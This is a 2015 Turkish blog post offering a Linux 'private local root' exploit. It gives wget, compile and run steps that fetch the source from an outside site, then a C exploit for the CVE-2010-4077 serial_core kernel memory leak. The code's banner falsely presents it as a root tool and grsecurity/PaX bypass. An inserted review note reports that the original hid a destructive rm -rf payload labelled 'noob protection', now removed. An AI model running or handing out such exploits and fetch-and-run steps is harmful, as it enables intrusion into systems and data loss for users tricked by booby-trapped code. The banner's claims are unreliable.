27 Şubat 2015 Cuma

2.6.37 2011 Private Local Root

Herkese kolay gelsin,

wget http://www.proksi.ws/2.6.37-2011.c
gcc 2.6.37-2011.c -o 2.6.37-2011
chmod 777 2.6.37-2011
./2.6.37-2011


/* 
 * modified by CrosS to bypass grsecurity and PaX on
 * linux kernels
 *
 * Linux <= 2.6.37-rc1 serial_core TIOCGICOUNT leak

 * ================================================

 * Information leak exploit for CVE-2010-4077 which

 * leaks kernel stack space back to userland due to

 * uninitialized struct member "reserved" in struct

 * serial_icounter_struct copied to userland. uses

 * ioctl to trigger memory leak, dumps to file and

 * displays to command line.

 *

 * -- prdelka

 *
 * by CrosS from r00tw0rm.com - Privat Community

 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#include <fcntl.h>
#include <termios.h>
#include <unistd.h>
#include <sys/ioctl.h>

#include <linux/serial.h>

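/*
 * Review note on the listing as published. The original had four printf()
 * calls at file scope (not valid C; they are kept below as print_banner()),
 * read one element past the end of buffer.reserved (i <= 9), summed a
 * possible -1 from write() into its byte count, and -- before writing any
 * output -- jumped into an embedded byte string through a function-pointer
 * cast. That byte string was removed: as pasted (backslashes lost) it is
 * plain ASCII and jumping into it only crashes; with the escapes restored
 * the bytes spell "/bin", "//rm", "-r", "-f" and end in int 0x80, i.e. a
 * destructive payload unrelated to the TIOCGICOUNT leak. The comment next to
 * it, "bm9vYiBwcm90ZWN0aW9u", is base64 for "noob protection".
 */

/* Banner text from the original listing (there it sat at file scope). */
static void print_banner(void)
{
    printf("Local  Root   2.6.37  exploit to bypass grsecurity and/or PaX by CrosS.\n");
    printf("aka ultimate auto rooter\n");
    printf("Shoutz to 1337day cr3w for helping!.\n");
    printf("http://www.r00tw0rm.com/forum.\n");
}

/*
 * Open the serial device named in argv[1], issue TIOCGICOUNT, and print and
 * save the "reserved" words of struct serial_icounter_struct, which on
 * affected kernels (CVE-2010-4077) are copied to userland uninitialised.
 *
 * Exit status: EXIT_SUCCESS once ./leak has been written; EXIT_FAILURE on a
 * usage error or on any failed open()/ioctl()/write()/close().
 */
int main(int argc, char *argv[])
{
    struct serial_icounter_struct buffer;
    /* Bound by the array itself rather than a hard-coded 9. */
    const int nwords = (int)(sizeof buffer.reserved / sizeof buffer.reserved[0]);

    print_banner();
    printf("[ Linux <= 2.6.37-rc1 serial_core TIOCGICOUNT leak exploit\n");

    if (argc < 2) {
        printf("[ You need to supply a device name e.g. /dev/ttyS0\n");
        return EXIT_FAILURE;
    }

    /* Zeroed first so that any non-zero word afterwards came from the kernel. */
    memset(&buffer, 0, sizeof buffer);

    /* O_NOCTTY: opening a tty must not make it this process's controlling terminal. */
    int fd = open(argv[1], O_RDONLY | O_NOCTTY);
    if (fd == -1) {
        printf("[ Couldn't open %s\n", argv[1]);
        return EXIT_FAILURE;
    }

    if (ioctl(fd, TIOCGICOUNT, &buffer) == -1) {
        printf("[ Problem with ioctl() request\n");
        close(fd);
        return EXIT_FAILURE;
    }
    close(fd);

    for (int i = 0; i < nwords; i++) {
        printf("[ int leak[%d]: %x\n", i, (unsigned)buffer.reserved[i]);
    }

    /* O_TRUNC so a longer ./leak left by an earlier run cannot keep stale
     * bytes behind the ones written now. */
    fd = open("./leak", O_RDWR | O_CREAT | O_TRUNC, 0640);
    if (fd == -1) {
        printf("[ Can't open file to write memory out\n");
        return EXIT_FAILURE;
    }

    int ret = 0;
    for (int i = 0; i < nwords; i++) {
        ssize_t n = write(fd, &buffer.reserved[i], sizeof buffer.reserved[i]);
        if (n < 0) {
            printf("[ write() to ./leak failed\n");
            close(fd);
            return EXIT_FAILURE;
        }
        ret += (int)n;
    }

    /* close() flushes the write stream; a failure here means ./leak is incomplete. */
    if (close(fd) == -1) {
        printf("[ close() of ./leak failed\n");
        return EXIT_FAILURE;
    }

    printf("[ Written %d leaked bytes to ./leak\n", ret);
    return EXIT_SUCCESS;
}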
